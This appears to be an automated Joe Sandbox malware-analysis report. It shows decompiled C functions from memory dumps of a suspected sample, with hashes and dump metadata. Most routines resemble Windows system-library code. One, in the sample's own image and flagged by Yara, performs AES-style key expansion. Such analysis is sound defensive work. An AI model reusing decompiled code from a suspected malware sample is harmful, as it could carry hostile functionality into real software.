                            							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                            						}
                            					} else {
                            						_t26 = _t57 + 0x180821c; // 0x0
                            						_t58 =  *_t26;
                            					}
                            					 *_t90 = _t58;
                            					goto L15;
                            				} else {
                            					goto L2;
                            				}
                            				while(1) {
                            					_t116 =  *_t61 & 0x0000ffff;
                            					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                            					if(_t116 == _t128) {
                            						goto L18;
                            					}
                            					L5:
                            					if(_t116 >= 0x61) {
                            						if(_t116 > 0x7a) {
                            							_t97 =  *0x1806d5c; // 0x7f7c0654
                            							_t72 =  *0x1806d5c; // 0x7f7c0654
                            							_t75 =  *0x1806d5c; // 0x7f7c0654
                            							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                            						} else {
                            							_t116 = _t116 - 0x20;
                            						}
                            					}
                            					if(_t128 >= 0x61) {
                            						if(_t128 > 0x7a) {
                            							_t102 =  *0x1806d5c; // 0x7f7c0654
                            							_t84 =  *0x1806d5c; // 0x7f7c0654
                            							_t87 =  *0x1806d5c; // 0x7f7c0654
                            							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                            						} else {
                            							_t128 = _t128 - 0x20;
                            						}
                            					}
                            					if(_t116 == _t128) {
                            						_t61 = _v12;
                            						_t96 = _v8;
                            					} else {
                            						_t113 = _t116 - _t128;
                            						L9:
                            						_t111 = _a4;
                            						if(_t113 == 0) {
                            							_t115 =  &(( *_t119)[_t111 + 1]);
                            							_t33 =  &(_t119[1]); // 0x100
                            							_t120 = _a8;
                            							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                            							_t35 = _t95 - 1; // 0xff
                            							_t124 = _t35;
                            							if(_t120 == 0) {
                            								L27:
                            								 *_a16 = _t95;
                            								_t56 = 0xc0000023;
                            								goto L16;
                            							}
                            							if(_t124 >= _a12) {
                            								if(_a12 >= 1) {
                            									 *_t120 = 0;
                            								}
                            								goto L27;
                            							}
                            							 *_a16 = _t124;
                            							_t125 = _t124 + _t124;
                            							E0175F3E0(_t120, _t115, _t125);
                            							_t56 = 0;
                            							 *((short*)(_t125 + _t120)) = 0;
                            							goto L16;
                            						}
                            						_t119 =  &(_t119[2]);
                            						if(_t119 < _v24) {
                            							L2:
                            							_t91 =  *_t119;
                            							_t61 = _t91;
                            							_v12 = _t61;
                            							_t112 =  &(_t61[_t111]);
                            							_v8 = _t112;
                            							if(_t61 >= _t112) {
                            								break;
                            							} else {
                            								_t127 = _v16 - _t91;
                            								_t96 = _t112;
                            								_v20 = _t127;
                            								_t116 =  *_t61 & 0x0000ffff;
                            								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                            								if(_t116 == _t128) {
                            									goto L18;
                            								}
                            								goto L5;
                            							}
                            						} else {
                            							_t90 = _v28;
                            							_t57 = _v32;
                            							_t123 = _v36;
                            							goto L12;
                            						}
                            					}
                            					L18:
                            					_t61 =  &(_t61[1]);
                            					_v12 = _t61;
                            					if(_t61 >= _t96) {
                            						break;
                            					}
                            					_t127 = _v20;
                            				}
                            				_t113 = 0;
                            				goto L9;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1f3a3ad436a982255466b52d15f3f5ef61f18d7e697ad17b182fd8fc6b92af13
                            • Instruction ID: e20c01a81fad91cb0107bc4074d0c68d652e408d63908a6116d0cfb16fcc764e
                            • Opcode Fuzzy Hash: 1f3a3ad436a982255466b52d15f3f5ef61f18d7e697ad17b182fd8fc6b92af13
                            • Instruction Fuzzy Hash: 14519F76A00119CFCB15CF1CD8909BDF7B1FB88700716845AF8469B326E730AAA1CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E00A82D8E(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                            				signed int _t66;
                            				signed int* _t71;
                            				signed int* _t84;
                            				signed int _t97;
                            				signed int _t99;
                            				signed int _t109;
                            				signed int _t111;
                            				signed int* _t113;
                            				signed int _t130;
                            				signed int _t132;
                            				signed int _t136;
                            				signed int _t157;
                            				intOrPtr _t179;
                            
                            				asm("adc eax, 0xec8b55f4");
                            				_t84 = _a12;
                            				_t113 = _a8;
                            				asm("ror esi, 0x8");
                            				asm("rol eax, 0x8");
                            				 *_t113 =  *_t84 & 0xff00ff00 |  *_t84 & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t113[1] = _t84[1] & 0xff00ff00 | _t84[1] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t113[2] = _t84[2] & 0xff00ff00 | _t84[2] & 0x00ff00ff;
                            				_t66 =  &(_t113[1]);
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t113[3] = _t84[3] & 0xff00ff00 | _t84[3] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t113[4] = _t84[4] & 0xff00ff00 | _t84[4] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t113[5] = _t84[5] & 0xff00ff00 | _t84[5] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t113[6] = _t84[6] & 0xff00ff00 | _t84[6] & 0x00ff00ff;
                            				asm("ror esi, 0x8");
                            				asm("rol ecx, 0x8");
                            				_t113[7] = _t84[7] & 0xff00ff00 | _t84[7] & 0x00ff00ff;
                            				if(_a16 != 0x100) {
                            					L5:
                            					return _t66 | 0xffffffff;
                            				} else {
                            					_t179 = _a4;
                            					_t71 = 0;
                            					_a12 = 0;
                            					while(1) {
                            						_t157 =  *(_t66 + 0x18);
                            						_t97 = ( *(_t179 + 4 + (_t157 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t179 +  &(_t71[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t179 + 4 + (_t157 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t179 + 5 + (_t157 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t179 + 4 + (_t157 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                            						_t130 =  *_t66 ^ _t97;
                            						 *(_t66 + 0x1c) = _t97;
                            						_t99 =  *(_t66 + 4) ^ _t130;
                            						 *(_t66 + 0x20) = _t130;
                            						_t132 =  *(_t66 + 8) ^ _t99;
                            						 *(_t66 + 0x24) = _t99;
                            						 *(_t66 + 0x28) = _t132;
                            						if(_t71 == 6) {
                            							break;
                            						}
                            						_t109 = ( *(_t179 + 4 + (_t132 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t179 + 4 + (_t132 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t179 + 4 + (_t132 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t179 + 5 + (_t132 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                            						_t136 =  *(_t66 + 0x10) ^ _t109;
                            						 *(_t66 + 0x2c) = _t109;
                            						_t111 =  *(_t66 + 0x14) ^ _t136;
                            						 *(_t66 + 0x34) = _t111;
                            						_t71 =  &(_a12[0]);
                            						 *(_t66 + 0x30) = _t136;
                            						 *(_t66 + 0x38) = _t111 ^ _t157;
                            						_t66 = _t66 + 0x20;
                            						_a12 = _t71;
                            						if(_t71 < 7) {
                            							continue;
                            						} else {
                            							goto L5;
                            						}
                            						goto L7;
                            					}
                            					return 0xe;
                            				}
                            				L7:
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 74bdb5be184b064fa34151192e1b3c6f6445b02d0038ed0d8b30c29e1998fdd7
                            • Instruction ID: bb1c71ceeb913b3529f226abe0e0666cdf028a92b33d6d3f609d8b91b4535546
                            • Opcode Fuzzy Hash: 74bdb5be184b064fa34151192e1b3c6f6445b02d0038ed0d8b30c29e1998fdd7
                            • Instruction Fuzzy Hash: 01517FB3E14A214BD318CF09CD40631B692EFD8312B5B81BEDD1A9B357CA74E9529B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E0173DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				char _v5;
                            				signed int _v12;
                            				signed int* _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t54;
                            				char* _t58;
                            				signed int _t66;
                            				intOrPtr _t67;
                            				intOrPtr _t68;
                            				intOrPtr _t72;
                            				intOrPtr _t73;
                            				signed int* _t75;
                            				intOrPtr _t79;
                            				intOrPtr _t80;
                            				char _t82;
                            				signed int _t83;
                            				signed int _t84;
                            				signed int _t88;
                            				signed int _t89;
                            				intOrPtr _t90;
                            				intOrPtr _t92;
                            				signed int _t97;
                            				intOrPtr _t98;
                            				intOrPtr* _t99;
                            				signed int* _t101;
                            				signed int* _t102;
                            				intOrPtr* _t103;
                            				intOrPtr _t105;
                            				signed int _t106;
                            				void* _t118;
                            
                            				_t92 = __edx;
                            				_t75 = _a4;
                            				_t98 = __ecx;
                            				_v44 = __edx;
                            				_t106 = _t75[1];
                            				_v40 = __ecx;
                            				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                            					_t82 = 0;
                            				} else {
                            					_t82 = 1;
                            				}
                            				_v5 = _t82;
                            				_t6 = _t98 + 0xc8; // 0xc9
                            				_t101 = _t6;
                            				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                            				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                            				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                            				if(_t82 != 0) {
                            					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                            					_t83 =  *_t75;
                            					_t54 = _t75[1];
                            					 *_t101 = _t83;
                            					_t84 = _t83 | _t54;
                            					_t101[1] = _t54;
                            					if(_t84 == 0) {
                            						_t101[1] = _t101[1] & _t84;
                            						 *_t101 = 1;
                            					}
                            					goto L19;
                            				} else {
                            					if(_t101 == 0) {
                            						L0171CC50(E01714510(0xc000000d));
                            						_t88 =  *_t101;
                            						_t97 = _t101[1];
                            						L15:
                            						_v12 = _t88;
                            						_t66 = _t88 -  *_t75;
                            						_t89 = _t97;
                            						asm("sbb ecx, [ebx+0x4]");
                            						_t118 = _t89 - _t97;
                            						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                            							_t66 = _t66 | 0xffffffff;
                            							_t89 = 0x7fffffff;
                            						}
                            						 *_t101 = _t66;
                            						_t101[1] = _t89;
                            						L19:
                            						if(E01737D50() != 0) {
                            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            						} else {
                            							_t58 = 0x7ffe0386;
                            						}
                            						_t102 = _v16;
                            						if( *_t58 != 0) {
                            							_t58 = L017E8ED6(_t102, _t98);
                            						}
                            						_t76 = _v44;
                            						E01732280(_t58, _v44);
                            						L0173DD82(_v44, _t102, _t98);
                            						E0173B944(_t102, _v5);
                            						return L0172FFB0(_t76, _t98, _t76);
                            					}
                            					_t99 = 0x7ffe03b0;
                            					do {
                            						_t103 = 0x7ffe0010;
                            						do {
                            							_t67 =  *0x1808628; // 0x0
                            							_v28 = _t67;
                            							_t68 =  *0x180862c; // 0x0
                            							_v32 = _t68;
                            							_v24 =  *((intOrPtr*)(_t99 + 4));
                            							_v20 =  *_t99;
                            							while(1) {
                            								_t97 =  *0x7ffe000c;
                            								_t90 =  *0x7FFE0008;
                            								if(_t97 ==  *_t103) {
                            									goto L10;
                            								}
                            								asm("pause");
                            							}
                            							L10:
                            							_t79 = _v24;
                            							_t99 = 0x7ffe03b0;
                            							_v12 =  *0x7ffe03b0;
                            							_t72 =  *0x7FFE03B4;
                            							_t103 = 0x7ffe0010;
                            							_v36 = _t72;
                            						} while (_v20 != _v12 || _t79 != _t72);
                            						_t73 =  *0x1808628; // 0x0
                            						_t105 = _v28;
                            						_t80 =  *0x180862c; // 0x0
                            					} while (_t105 != _t73 || _v32 != _t80);
                            					_t98 = _v40;
                            					asm("sbb edx, [ebp-0x20]");
                            					_t88 = _t90 - _v12 - _t105;
                            					_t75 = _a4;
                            					asm("sbb edx, eax");
                            					_t31 = _t98 + 0xc8; // 0x17dfb53
                            					_t101 = _t31;
                            					 *_t101 = _t88;
                            					_t101[1] = _t97;
                            					goto L15;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0eebb5a266d71b806cdb0743ff12c2e28d3597ddfe6ed2017b174f7d45fda449
                            • Instruction ID: b317120a30c0b98e0eb7ce027d2084bc195314f8fc02539dc59c91aa4cad196c
                            • Opcode Fuzzy Hash: 0eebb5a266d71b806cdb0743ff12c2e28d3597ddfe6ed2017b174f7d45fda449
                            • Instruction Fuzzy Hash: 1351A3B1E00616DFCB25DFACC484AAEFBF1BF88310F25815AD555A7346DB30A984CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 97%
                            			E01742990() {
                            				signed int* _t62;
                            				signed int _t64;
                            				intOrPtr _t66;
                            				intOrPtr* _t69;
                            				intOrPtr _t76;
                            				intOrPtr* _t79;
                            				void* _t81;
                            				signed int _t82;
                            				intOrPtr* _t83;
                            				signed int _t87;
                            				intOrPtr _t91;
                            				void* _t98;
                            				intOrPtr _t99;
                            				void* _t101;
                            				signed int* _t102;
                            				void* _t103;
                            				void* _t104;
                            				void* _t107;
                            
                            				_push(0x20);
                            				_push(0x17eff00);
                            				E0176D08C(_t81, _t98, _t101);
                            				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                            				_t99 = 0;
                            				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                            				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                            				if(_t82 == 0) {
                            					_t62 = 0xc0000100;
                            				} else {
                            					 *((intOrPtr*)(_t103 - 4)) = 0;
                            					_t102 = 0xc0000100;
                            					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                            					_t64 = 4;
                            					while(1) {
                            						 *(_t103 - 0x24) = _t64;
                            						if(_t64 == 0) {
                            							break;
                            						}
                            						_t87 = _t64 * 0xc;
                            						 *(_t103 - 0x2c) = _t87;
                            						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x16f1664));
                            						if(_t107 <= 0) {
                            							if(_t107 == 0) {
                            								_t79 = L0175E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x16f1668)), _t82);
                            								_t104 = _t104 + 0xc;
                            								__eflags = _t79;
                            								if(__eflags == 0) {
                            									_t102 = E017951BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x16f166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                            									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                            									break;
                            								} else {
                            									_t64 =  *(_t103 - 0x24);
                            									goto L5;
                            								}
                            								goto L13;
                            							} else {
                            								L5:
                            								_t64 = _t64 - 1;
                            								continue;
                            							}
                            						}
                            						break;
                            					}
                            					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                            					__eflags = _t102;
                            					if(_t102 < 0) {
                            						__eflags = _t102 - 0xc0000100;
                            						if(_t102 == 0xc0000100) {
                            							_t83 =  *((intOrPtr*)(_t103 + 8));
                            							__eflags = _t83;
                            							if(_t83 != 0) {
                            								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                            								__eflags =  *_t83 - _t99;
                            								if( *_t83 == _t99) {
                            									_t102 = 0xc0000100;
                            									goto L19;
                            								} else {
                            									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                            									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                            									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                            									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                            										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                            										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                            											L26:
                            											_t102 = E01742AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                            											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                            											__eflags = _t102 - 0xc0000100;
                            											if(_t102 != 0xc0000100) {
                            												goto L12;
                            											} else {
                            												_t99 = 1;
                            												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                            												goto L18;
                            											}
                            										} else {
                            											_t69 = L01726600( *((intOrPtr*)(_t91 + 0x1c)));
                            											__eflags = _t69;
                            											if(_t69 != 0) {
                            												goto L26;
                            											} else {
                            												_t83 =  *((intOrPtr*)(_t103 + 8));
                            												goto L18;
                            											}
                            										}
                            									} else {
                            										L18:
                            										_t102 = L01742C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                            										L19:
                            										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                            										goto L12;
                            									}
                            								}
                            								L28:
                            							} else {
                            								L0172EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            								 *((intOrPtr*)(_t103 - 4)) = 1;
                            								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                            								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                            								_t76 = E01742AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                            								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                            								__eflags = _t76 - 0xc0000100;
                            								if(_t76 == 0xc0000100) {
                            									 *((intOrPtr*)(_t103 - 0x1c)) = L01742C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                            								}
                            								 *((intOrPtr*)(_t103 - 4)) = _t99;
                            								E01742ACB();
                            							}
                            						}
                            					}
                            					L12:
                            					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                            					_t62 = _t102;
                            				}
                            				L13:
                            				return E0176D0D1(_t62);
                            				goto L28;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 166c86fe01408d79190b3787269a1c0b5fddcb86d09eccdfa32442f0f287a41c
                            • Instruction ID: 41dd287d89d27e7e2530ed3c1981b89b71c799b700698aedd79e0b70cc92fffb
                            • Opcode Fuzzy Hash: 166c86fe01408d79190b3787269a1c0b5fddcb86d09eccdfa32442f0f287a41c
                            • Instruction Fuzzy Hash: 09515871A0021AEFDF25DF59D844AAEFBB5BF58350F018155FD04AB266C3318A62CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E01744D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                            				signed int _v12;
                            				char _v176;
                            				char _v177;
                            				char _v184;
                            				intOrPtr _v192;
                            				intOrPtr _v196;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t42;
                            				char* _t44;
                            				intOrPtr _t46;
                            				intOrPtr _t50;
                            				char* _t57;
                            				intOrPtr _t59;
                            				intOrPtr _t67;
                            				signed int _t69;
                            
                            				_t64 = __edx;
                            				_v12 =  *0x180d360 ^ _t69;
                            				_t65 = 0xa0;
                            				_v196 = __edx;
                            				_v177 = 0;
                            				_t67 = __ecx;
                            				_v192 = __ecx;
                            				E0175FA60( &_v176, 0, 0xa0);
                            				_t57 =  &_v176;
                            				_t59 = 0xa0;
                            				if( *0x1807bc8 != 0) {
                            					L3:
                            					while(1) {
                            						asm("movsd");
                            						asm("movsd");
                            						asm("movsd");
                            						asm("movsd");
                            						_t67 = _v192;
                            						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                            						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                            						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                            						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                            						_push( &_v184);
                            						_push(_t59);
                            						_push(_t57);
                            						_push(0xa0);
                            						_push(_t57);
                            						_push(0xf);
                            						_t42 = E0175B0B0();
                            						if(_t42 != 0xc0000023) {
                            							break;
                            						}
                            						if(_v177 != 0) {
                            							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                            						}
                            						_v177 = 1;
                            						_t44 = L01734620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                            						_t59 = _v184;
                            						_t57 = _t44;
                            						if(_t57 != 0) {
                            							continue;
                            						} else {
                            							_t42 = 0xc0000017;
                            							break;
                            						}
                            					}
                            					if(_t42 != 0) {
                            						_t65 = L0171CCC0(_t42);
                            						if(_t65 != 0) {
                            							L10:
                            							if(_v177 != 0) {
                            								if(_t57 != 0) {
                            									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                            								}
                            							}
                            							_t46 = _t65;
                            							L12:
                            							return L0175B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                            						}
                            						L7:
                            						_t50 = _a4;
                            						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                            						if(_t50 != 3) {
                            							if(_t50 == 2) {
                            								goto L8;
                            							}
                            							L9:
                            							if(E0175F380(_t67 + 0xc, 0x16f5138, 0x10) == 0) {
                            								 *0x18060d8 = _t67;
                            							}
                            							goto L10;
                            						}
                            						L8:
                            						_t64 = _t57 + 0x28;
                            						L01744F49(_t67, _t57 + 0x28);
                            						goto L9;
                            					}
                            					_t65 = 0;
                            					goto L7;
                            				}
                            				if(L01744E70(0x18086b0, 0x1745690, 0, 0) != 0) {
                            					_t46 = L0171CCC0(_t56);
                            					goto L12;
                            				} else {
                            					_t59 = 0xa0;
                            					goto L3;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cf412cd6fa10fd9fb0422ed370e56e7dd8d20d67e4694207f6410f2c21717d01
                            • Instruction ID: 0ee0fb491f0084bea54b5543cf8de5579d3c992b7a1a713589b9237c5d88d41b
                            • Opcode Fuzzy Hash: cf412cd6fa10fd9fb0422ed370e56e7dd8d20d67e4694207f6410f2c21717d01
                            • Instruction Fuzzy Hash: DE41D671A40328AFEB32DF18CC84F6AF7A9EB55710F0440D9E94697285D7B0ED84CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E01744BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                            				signed int _v8;
                            				short _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				char _v36;
                            				char _v156;
                            				short _v158;
                            				intOrPtr _v160;
                            				char _v164;
                            				intOrPtr _v168;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t45;
                            				intOrPtr _t74;
                            				signed char _t77;
                            				short _t84;
                            				char* _t85;
                            				void* _t86;
                            				intOrPtr _t87;
                            				void* _t88;
                            				signed int _t89;
                            
                            				_t83 = __edx;
                            				_v8 =  *0x180d360 ^ _t89;
                            				_t45 = _a8 & 0x0000ffff;
                            				_v158 = __edx;
                            				_v168 = __ecx;
                            				if(_t45 == 0) {
                            					L22:
                            					_t86 = 6;
                            					L12:
                            					L0171CC50(_t86);
                            					L11:
                            					return L0175B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                            				}
                            				_t77 = _a4;
                            				if((_t77 & 0x00000001) != 0) {
                            					goto L22;
                            				}
                            				_t8 = _t77 + 0x34; // 0xdce0ba00
                            				if(_t45 !=  *_t8) {
                            					goto L22;
                            				}
                            				_t9 = _t77 + 0x24; // 0x1808504
                            				E01732280(_t9, _t9);
                            				_t87 = 0x78;
                            				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                            				E0175FA60( &_v156, 0, _t87);
                            				_t13 = _t77 + 0x30; // 0x3db8
                            				_t85 =  &_v156;
                            				_v36 =  *_t13;
                            				_v28 = _v168;
                            				_v32 = 0;
                            				_v24 = 0;
                            				_v20 = _v158;
                            				_v160 = 0;
                            				while(1) {
                            					_push( &_v164);
                            					_push(_t87);
                            					_push(_t85);
                            					_push(0x18);
                            					_push( &_v36);
                            					_push(0x1e);
                            					_t88 = E0175B0B0();
                            					if(_t88 != 0xc0000023) {
                            						break;
                            					}
                            					if(_t85 !=  &_v156) {
                            						L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                            					}
                            					_t84 = L01734620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                            					_v168 = _v164;
                            					if(_t84 == 0) {
                            						_t88 = 0xc0000017;
                            						goto L19;
                            					} else {
                            						_t74 = _v160 + 1;
                            						_v160 = _t74;
                            						if(_t74 >= 0x10) {
                            							L19:
                            							_t86 = L0171CCC0(_t88);
                            							if(_t86 != 0) {
                            								L8:
                            								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                            								_t30 = _t77 + 0x24; // 0x1808504
                            								L0172FFB0(_t77, _t84, _t30);
                            								if(_t84 != 0 && _t84 !=  &_v156) {
                            									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                            								}
                            								if(_t86 != 0) {
                            									goto L12;
                            								} else {
                            									goto L11;
                            								}
                            							}
                            							L6:
                            							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                            							if(_v164 != 0) {
                            								_t83 = _t84;
                            								L01744F49(_t77, _t84);
                            							}
                            							goto L8;
                            						}
                            						_t87 = _v168;
                            						continue;
                            					}
                            				}
                            				if(_t88 != 0) {
                            					goto L19;
                            				}
                            				goto L6;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 32d118bcd7837c744ebd18ddb7100b518f9b30845e27b457e3da73dc44f41c17
                            • Instruction ID: 05d9c0070e58230edc09001b800dfde26ee6399035f69887be50b383c2bdccb1
                            • Opcode Fuzzy Hash: 32d118bcd7837c744ebd18ddb7100b518f9b30845e27b457e3da73dc44f41c17
                            • Instruction Fuzzy Hash: 7441C135A40229ABDB31EF68C944FEEF7B4EF45710F0500A5E909AB245EB74DE80CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

